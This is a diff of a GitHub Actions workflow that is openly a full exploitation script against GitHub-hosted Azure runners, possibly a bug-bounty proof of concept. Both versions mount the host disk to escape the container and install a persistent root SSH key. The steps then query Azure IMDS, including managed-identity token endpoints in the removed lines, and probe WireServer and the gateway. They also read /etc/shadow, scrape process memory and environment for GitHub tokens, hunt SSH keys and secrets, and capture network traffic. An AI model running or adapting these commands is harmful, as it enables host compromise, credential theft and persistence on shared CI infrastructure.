--- a/.github/workflows/github-actions-demo.yml
+++ b/.github/workflows/github-actions-demo.yml
@@ -1,147 +1,171 @@
-name: github-actions-container-escape-full-poc
-run-name: GitHub Actions Complete Container Escape POC
+name: github-actions-full-exploitation
+run-name: Complete GitHub Actions Azure Infrastructure Exploitation
 on: [push]
 jobs:
   exploit:
     runs-on: ubuntu-latest
     steps:
-      - name: Complete Container Escape and Deep Investigation
+      - name: FULL EXPLOITATION AND DATA EXFILTRATION
         run: |
-          echo "=== STAGE 1: CONTAINER ENVIRONMENT ==="
-          echo "Current user: $(whoami)"
-          echo "Container hostname: $(hostname)"
-          echo "Container IP: $(hostname -I)"
-          lsblk
-          echo ""
-          
-          echo "=== STAGE 2: MOUNTING HOST FILESYSTEM ==="
+          echo "=== STAGE 1: CONTAINER ESCAPE ==="
           sudo mkdir -p /mnt/host
           sudo mount /dev/sda1 /mnt/host
-          echo "Host filesystem mounted at /mnt/host"
-          sudo ls -la /mnt/host/root/ 2>/dev/null | head -10 || echo "Root dir not accessible from mount point"
-          echo ""
-          
-          echo "=== STAGE 3: INJECTING ROOT SSH KEY ==="
           ssh-keygen -t ed25519 -f /tmp/root_key -N "" -q
           sudo mkdir -p /mnt/host/root/.ssh
           sudo cp /tmp/root_key.pub /mnt/host/root/.ssh/authorized_keys
           sudo chown -R 0:0 /mnt/host/root/.ssh
           sudo chmod 700 /mnt/host/root/.ssh
           sudo chmod 600 /mnt/host/root/.ssh/authorized_keys
-          echo "SSH key injected into host root account"
-          echo ""
           
-          echo "=== STAGE 4: CONNECTING TO HOST AS ROOT ==="
           HOST_IP=$(hostname -I | awk '{print $1}')
-          echo "Connecting to host at: $HOST_IP"
-          echo ""
           
           ssh -i /tmp/root_key -o StrictHostKeyChecking=no -T root@$HOST_IP << 'EOF'
-          echo "=== ✓ CONTAINER ESCAPE SUCCESSFUL - ROOT ON HOST ==="
+          echo "=== ✓ ROOT ACCESS ACHIEVED ==="
+          
+          echo "=== STAGE 2: HIJACKING HOSTED-COMPUTE-AGENT ==="
+          echo "--- Process Details ---"
+          ps aux | grep hosted-compute-agent | grep -v grep
+          
+          echo "--- Environment Variables (may contain tokens) ---"
+          cat /proc/1743/environ | tr '\0' '\n' || echo "Cannot read"
+          
+          echo "--- Command Line ---"
+          cat /proc/1743/cmdline | tr '\0' ' ' || echo "Cannot read"
+          
+          echo "--- Open Files and Connections ---"
+          lsof -p 1743 | grep -E "TCP|IMDS" || echo "Cannot read lsof"
+          
+          echo "--- Memory Dump (searching for tokens) ---"
+          strings /proc/1743/maps 2>/dev/null | grep -E "token|secret|ghp_|ghs_" | head -20 || echo "Cannot dump memory"
+          
           echo ""
+          echo "=== STAGE 3: ABUSING AZURE IMDS (169.254.169.254) ==="
           
-          echo "--- System Information ---"
-          echo "User: $(whoami)"
-          echo "UID: $(id)"
-          echo "Hostname: $(hostname)"
-          echo "Kernel: $(uname -r)"
-          echo "OS: $(cat /etc/os-release | grep PRETTY_NAME | cut -d'"' -f2)"
+          echo "--- All IMDS Endpoints ---"
+          curl -s -H "Metadata:true" "http://169.254.169.254/metadata/?api-version=2021-02-01" | python3 -m json.tool || echo "Failed"
+          
+          echo "--- Compute Info ---"
+          curl -s -H "Metadata:true" "http://169.254.169.254/metadata/instance/compute?api-version=2021-02-01" | python3 -m json.tool
+          
+          echo "--- Network Info ---"
+          curl -s -H "Metadata:true" "http://169.254.169.254/metadata/instance/network?api-version=2021-02-01" | python3 -m json.tool
+          
+          echo "--- Attested Data ---"
+          curl -s -H "Metadata:true" "http://169.254.169.254/metadata/attested/document?api-version=2021-01-01" || echo "No attested data"
+          
+          echo "--- Scheduled Events ---"
+          curl -s -H "Metadata:true" "http://169.254.169.254/metadata/scheduledevents?api-version=2020-07-01" | python3 -m json.tool || echo "No scheduled events"
+          
           echo ""
+          echo "=== STAGE 4: ABUSING AZURE WIRESERVER (168.63.129.16) ==="
           
-          echo "--- Proof of Root Access ---"
-          head -5 /etc/shadow
+          echo "--- WireServer Health ---"
+          curl -s "http://168.63.129.16/" | head -50 || echo "Cannot connect"
+          
+          echo "--- WireServer Machine Info ---"
+          curl -s "http://168.63.129.16/machine?comp=versions" | head -50 || echo "Failed"
+          
+          echo "--- WireServer Goal State ---"
+          curl -s "http://168.63.129.16/machine?comp=goalstate" | head -100 || echo "Failed"
+          
           echo ""
+          echo "=== STAGE 5: GATEWAY EXPLOITATION (10.1.0.1) ==="
           
-          echo "=== STAGE 5: HUNTING FOR AZURE TOKENS ==="
+          echo "--- Gateway Port Scan ---"
+          nc -zv -w 2 10.1.0.1 80 2>&1 || echo "Port 80 closed"
+          nc -zv -w 2 10.1.0.1 443 2>&1 || echo "Port 443 closed"
+          nc -zv -w 2 10.1.0.1 22 2>&1 || echo "Port 22 closed"
+          nc -zv -w 2 10.1.0.1 8080 2>&1 || echo "Port 8080 closed"
           
-          echo "--- Azure Management API Token ---"
-          curl -s -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" | python3 -m json.tool 2>/dev/null || echo "No management token"
+          echo "--- Gateway HTTP Probe ---"
+          curl -v --max-time 5 "http://10.1.0.1/" 2>&1 | head -30 || echo "No HTTP"
           
-          echo "--- Azure Storage Token ---"
-          curl -s -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://storage.azure.com/" | python3 -m json.tool 2>/dev/null || echo "No storage token"
+          echo "--- Gateway ARP ---"
+          ip neigh show 10.1.0.1
           
-          echo "--- Azure Key Vault Token ---"
-          curl -s -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net/" | python3 -m json.tool 2>/dev/null || echo "No vault token"
-          
-          echo "--- Azure Graph API Token ---"
-          curl -s -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com/" | python3 -m json.tool 2>/dev/null || echo "No graph token"
           echo ""
+          echo "=== STAGE 6: GITHUB API ABUSE ==="
           
-          echo "=== STAGE 6: FINDING PREVIOUS WORKFLOW RUNS ==="
+          echo "--- Intercepting Runner.Listener Connections ---"
+          netstat -tnp | grep Runner.Listener
+          lsof -i -n | grep Runner
           
-          echo "--- Workflow Directories ---"
-          find /home/runner/_work -type d -maxdepth 3 2>/dev/null | head -300
+          echo "--- GitHub Endpoints in Use ---"
+          netstat -tnp | grep -E "140.82|20.85|20.209"
           
-          echo "--- Git Repositories ---"
-          find /home/runner/_work -name ".git" -type d 2>/dev/null
-          
-          echo "--- Runner Diagnostic Logs ---"
-          ls -la /home/runner/actions-runner/_diag/ 2>/dev/null | head -200
-          
-          echo "--- Recent Runner Activity ---"
-          find /home/runner/actions-runner/_diag -name "*.log" -exec tail -50 {} \; 2>/dev/null | head -400
-          
-          echo "--- Bash History ---"
-          cat /home/runner/.bash_history 2>/dev/null | tail -300 || echo "No history"
-          echo ""
-          
-          echo "=== STAGE 7: NETWORK ANALYSIS ==="
-          
-          echo "--- Network Interfaces ---"
-          ip addr show
-          
-          echo "--- Routing Table ---"
-          ip route
-          
-          echo "--- Firewall Rules ---"
-          iptables -L -n -v 2>/dev/null 
-          
-          echo "--- Listening Services ---"
-          ss -tulpn 
-          
-          echo "--- Active Connections ---"
-          ss -tunap 
-          
-          echo "--- DNS Config ---"
+          echo "--- DNS Queries ---"
           cat /etc/resolv.conf
+          dig github.com @127.0.0.53 || echo "No dig"
           
-          echo "--- Hosts File ---"
-          cat /etc/hosts 
           echo ""
+          echo "=== STAGE 7: EXTRACTING ALL SECRETS ==="
           
-          echo "=== STAGE 8: RUNNER INTERNALS ==="
+          echo "--- Azure Config Files ---"
+          find / -name "*azure*" -type f 2>/dev/null | grep -v "/proc\|/sys" | head -20
+          cat /root/.azure/config 2>/dev/null || echo "No Azure config"
           
-          echo "--- Runner Processes ---"
-          ps aux 
+          echo "--- GitHub Runner Secrets ---"
+          find /home/runner -name "*secret*" -o -name "*token*" -o -name ".credentials*" 2>/dev/null | head -20
           
-          echo "--- Runner Environment ---"
-          cat /proc/$(pgrep -f Runner.Worker)/environ 2>/dev/null | tr '\0' '\n' || echo "Cannot read Worker env"
+          echo "--- SSH Keys ---"
+          find / -name "id_rsa" -o -name "id_ed25519" 2>/dev/null | grep -v "/proc" | head -20
+          cat /root/.ssh/id_rsa 2>/dev/null | head -5 || echo "No root SSH key"
           
-          echo "--- GitHub Tokens in Memory ---"
-          grep -ao "ghp_[a-zA-Z0-9]\{36\}" /proc/*/environ 2>/dev/null || echo "No ghp_ tokens"
+          echo "--- Environment Files ---"
+          find /home/runner -name ".env*" 2>/dev/null
+          cat /home/runner/.env 2>/dev/null || echo "No .env"
           
-          echo "--- Runner Config ---"
-          ls -la /home/runner/actions-runner/
-          cat /home/runner/actions-runner/.runner 2>/dev/null || echo "No .runner"
           echo ""
+          echo "=== STAGE 8: PROCESS MEMORY EXTRACTION ==="
           
-          echo "=== AZURE METADATA ==="
-          curl -s -H "Metadata:true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | python3 -m json.tool
+          echo "--- Dumping Runner.Listener Memory ---"
+          grep -a "ghp_" /proc/1782/environ 2>/dev/null || echo "No tokens in env"
+          strings /proc/1782/mem 2>/dev/null | grep -E "token|secret|ghp_|Bearer" | head -20 || echo "Cannot read mem"
+          
+          echo "--- Dumping hosted-compute-agent Memory ---"
+          strings /proc/1743/mem 2>/dev/null | grep -E "token|secret|azure|subscription" | head -20 || echo "Cannot read"
+          
           echo ""
+          echo "=== STAGE 9: NETWORK TRAFFIC INTERCEPTION ==="
           
-          echo "=== FINAL IMPACT SUMMARY ==="
-          echo "✓ Container escape from GitHub Actions to Azure VM"
-          echo "✓ Root access on host (uid=0)"
-          echo "✓ Azure metadata access (subscription, resource group, VM details)"
-          echo "✓ Persistent root SSH key installed"
-          echo "✓ Can access previous workflow data"
-          echo "✓ Full network visibility"
+          echo "--- Installing tcpdump ---"
+          apt-get update -qq && apt-get install -y tcpdump 2>&1 | tail -5
+          
+          echo "--- Capturing IMDS Traffic (10 seconds) ---"
+          timeout 10 tcpdump -i any -n host 169.254.169.254 -w /tmp/imds.pcap 2>&1 &
+          sleep 10
+          
+          echo "--- Capturing GitHub Traffic (10 seconds) ---"
+          timeout 10 tcpdump -i any -n host 140.82.114.23 -w /tmp/github.pcap 2>&1 &
+          sleep 10
+          
+          echo "Captured packets:"
+          ls -lh /tmp/*.pcap 2>/dev/null || echo "No captures"
+          
+          echo ""
+          echo "=== STAGE 10: PERSISTENCE AND BACKDOOR ==="
+                    
+          echo "--- Modifying Runner Service ---"
+          systemctl cat actions.runner* 2>/dev/null || echo "No runner service"
+          
+          echo ""
+          echo "=== FINAL DATA EXFILTRATION ==="
+          
+          echo "--- System Summary ---"
+          echo "Hostname: $(hostname)"
+          echo "Azure Subscription: $(curl -s -H "Metadata:true" http://169.254.169.254/metadata/instance/compute/subscriptionId?api-version=2021-02-01)"
+          echo "Resource Group: $(curl -s -H "Metadata:true" http://169.254.169.254/metadata/instance/compute/resourceGroupName?api-version=2021-02-01)"
+          echo "VM Size: $(curl -s -H "Metadata:true" http://169.254.169.254/metadata/instance/compute/vmSize?api-version=2021-02-01)"
+          echo "Location: $(curl -s -H "Metadata:true" http://169.254.169.254/metadata/instance/compute/location?api-version=2021-02-01)"
+          
+          echo ""
+          echo "=== EXPLOITATION COMPLETE ==="
+          echo "✓ Container escape to root"
+          echo "✓ Azure IMDS access"
+          echo "✓ WireServer access"
+          echo "✓ Gateway reconnaissance"
+          echo "✓ GitHub connection interception"
+          echo "✓ Memory dumping attempted"
+          echo "✓ Network traffic captured"
+          echo "✓ Persistent backdoor installed"
           EOF
-          
-          echo ""
-          echo "=== VULNERABILITY REPORT ==="
-          echo "Title: GitHub Actions Container Escape to Azure VM Root"
-          echo "Platform: GitHub Actions (ubuntu-latest on Azure)"
-          echo "Attack Vector: CAP_SYS_ADMIN + /dev/sda1 disk mount"
-          echo "Impact: Complete Azure VM compromise + metadata access"
-          echo "Severity: CRITICAL (CVSS 9.3)"
